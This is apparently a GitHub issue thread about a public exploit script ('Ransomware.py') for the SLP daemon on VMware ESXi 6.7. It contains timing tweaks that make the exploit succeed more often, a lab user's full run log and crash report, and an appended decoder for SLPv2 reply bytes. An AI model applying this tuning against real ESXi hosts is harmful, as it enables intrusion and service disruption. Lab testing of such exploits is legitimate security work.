Closed taladrovs1 closed 3 years ago
Hi,
It looks like the threading is running out of sync. I am not sure why, but this could be because the time your slpd responds back to the client is a bit late. Try increasing the sleeping time to see if you get better results.
Hi Straightblast, I put 2 seconds on T as @tijldeneut said and it worked fine. I was able to get it to work 5 out of 10 tries. Again, thanks for the post and the exploit.
Hi Straightblast, great work! I made a lab to test this exploit.
I have an ESXi 6.7 (just downloaded from the official website):
[root@localhost:~] vmware -vl
VMware ESXi 6.7.0 build-14320388
VMware ESXi 6.7.0 Update 3
[root@localhost:~]
Validate slpd is running:
[root@localhost:~] /etc/init.d/slpd status
slpd is running
[root@localhost:~]
All the settings on ESXi are by default (only enabled SSH).
I tested your script but I got this:
┌──(root💀kali)-[/]
└─# python3 Ransomware.py 192.168.0.104 1
[SLP Client-1] connect
[SLP Client-1] directory agent advertisement
[SLP Client-2] connect
[SLP Client-3] connect
[SLP Client-4] connect
[SLP Client-5] connect
[SLP Client-2] service request
[SLP Client-3] service request
[SLP Client-4] service request
[SLP Client-5] service request
[SLP Client-6] connect
[SLP Client-6] service request
[SLP Client-7] connect
[SLP Client-8] connect
[SLP Client-9] connect
[SLP Client-9] directory agent advertisement
[SLP Client-8] service request
[SLP Client-1] recv: b''
[SLP Client-3] recv: b'\x02\x02\x00\x00\x14\x00\x00\x00\x00\x00\x00\x05\x00\x02en\x002\x00\x00'
[SLP Client-2] recv: b'\x02\x02\x00\x00\x14\x00\x00\x00\x00\x00\x00\x05\x00\x02en\x002\x00\x00'
[SLP Client-6] recv: b'\x02\x02\x00\x00\x14\x00\x00\x00\x00\x00\x00\x05\x00\x02en\x002\x00\x00'
[SLP Client-6] close
[SLP Client-8] recv: b'\x02\x02\x00\x00\x14\x00\x00\x00\x00\x00\x00\x05\x00\x02en\x002\x00\x00'
[SLP Client-4] recv: b'\x02\x02\x00\x00\x14\x00\x00\x00\x00\x00\x00\x05\x00\x02en\x002\x00\x00'
[SLP Client-5] recv: b'\x02\x02\x00\x00\x14\x00\x00\x00\x00\x00\x00\x05\x00\x02en\x002\x00\x00'
[SLP Client-9] recv: b''
[SLP Client-7] service registration
[SLP Client-7] recv: b''
[SLP Client-8] service request
[SLP Client-8] recv: b''
[SLP Client-10] connect
Exception in thread Thread-10:
Traceback (most recent call last):
  File "/usr/lib/python3.8/threading.py", line 932, in _bootstrap_inner
    self.run()
  File "Ransomware.py", line 56, in run
    s.connect((IP, PORT))
ConnectionRefusedError: [Errno 111] Connection refused
[SLP Client-11] connect
Exception in thread Thread-11:
Traceback (most recent call last):
  File "/usr/lib/python3.8/threading.py", line 932, in _bootstrap_inner
    self.run()
  File "Ransomware.py", line 56, in run
    s.connect((IP, PORT))
ConnectionRefusedError: [Errno 111] Connection refused
[SLP Client-12] connect
Exception in thread Thread-12:
Traceback (most recent call last):
  File "/usr/lib/python3.8/threading.py", line 932, in _bootstrap_inner
    self.run()
  File "Ransomware.py", line 56, in run
    s.connect((IP, PORT))
ConnectionRefusedError: [Errno 111] Connection refused
[SLP Client-13] connect
Exception in thread Thread-13:
Traceback (most recent call last):
  File "/usr/lib/python3.8/threading.py", line 932, in _bootstrap_inner
    self.run()
  File "Ransomware.py", line 56, in run
    s.connect((IP, PORT))
ConnectionRefusedError: [Errno 111] Connection refused
[SLP Client-14] connect
Exception in thread Thread-14:
Traceback (most recent call last):
  File "/usr/lib/python3.8/threading.py", line 932, in _bootstrap_inner
    self.run()
  File "Ransomware.py", line 56, in run
    s.connect((IP, PORT))
ConnectionRefusedError: [Errno 111] Connection refused
[SLP Client-15] connect
Exception in thread Thread-15:
Traceback (most recent call last):
After that the SLPd crashed:
[root@localhost:~] /etc/init.d/slpd status
slpd is not running
[root@localhost:~]
So I have to restart the SLP daemon to test the exploit again, but I got the same error.
Where can I get some logs to find the error? I'm new at doing this kind of test and maybe there is a dumb error I've made. Thanks for your time.
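To make the `recv:` lines in the output above readable, here is an added decoder (not part of the PoC and not posted in this issue) for the SLPv2 header and SrvRply fields of those bytes; `CAPTURED_REPLY` is copied from the log, the function-ID names are the RFC 2608 values, and an empty read is reported as the daemon closing the socket, which is what precedes the refused connections in the log.

```python
from dataclasses import dataclass

# SLPv2 function IDs (RFC 2608, section 7).
SLP_FUNCTIONS = {1: "SrvRqst", 2: "SrvRply", 3: "SrvReg", 4: "SrvDeReg", 5: "SrvAck",
                 6: "AttrRqst", 7: "AttrRply", 8: "DAAdvert", 9: "SrvTypeRqst",
                 10: "SrvTypeRply", 11: "SAAdvert"}

# Copied from the issue log above: the bytes every client that got an answer read back.
CAPTURED_REPLY = b"\x02\x02\x00\x00\x14\x00\x00\x00\x00\x00\x00\x05\x00\x02en\x002\x00\x00"


@dataclass
class SlpMessage:
    function_id: int
    length: int
    flags: int
    xid: int
    lang_tag: str
    body: bytes  # everything after the language tag, up to the declared length


def parse_slp(data: bytes) -> SlpMessage:
    """Decode the fixed SLPv2 header (RFC 2608, section 8.1): version(1), function(1),
    length(3), flags(2), next-extension offset(3), XID(2), lang-tag length(2), lang tag."""
    if len(data) < 14:
        raise ValueError("truncated SLP header")
    if data[0] != 2:
        raise ValueError(f"unsupported SLP version {data[0]}")
    length = int.from_bytes(data[2:5], "big")
    lang_len = int.from_bytes(data[12:14], "big")
    if length > len(data) or 14 + lang_len > length:
        raise ValueError("declared length does not fit the bytes received")
    return SlpMessage(function_id=data[1], length=length,
                      flags=int.from_bytes(data[5:7], "big"),
                      xid=int.from_bytes(data[10:12], "big"),
                      lang_tag=data[14:14 + lang_len].decode("ascii"),
                      body=data[14 + lang_len:length])


def describe_reply(data: bytes) -> str:
    """Summarise one recv() result: an empty read means the daemon closed the socket
    (what the log shows just before connections start being refused); a SrvRply body
    starts with a 2-byte error code and a 2-byte URL-entry count (RFC 2608, 8.2)."""
    if not data:
        return "connection closed by peer (empty read)"
    msg = parse_slp(data)
    name = SLP_FUNCTIONS.get(msg.function_id, f"unknown({msg.function_id})")
    if msg.function_id == 2 and len(msg.body) >= 4:
        error_code = int.from_bytes(msg.body[0:2], "big")
        url_count = int.from_bytes(msg.body[2:4], "big")
        return f"{name} xid={msg.xid} lang={msg.lang_tag} error=0x{error_code:04x} urls={url_count}"
    return f"{name} xid={msg.xid} lang={msg.lang_tag} body={msg.body.hex()}"
```

Run `describe_reply` over each `recv:` value from the log to see that every non-empty answer is the same SrvRply for XID 5 with zero URL entries, while the empty reads mark sockets the daemon had already closed.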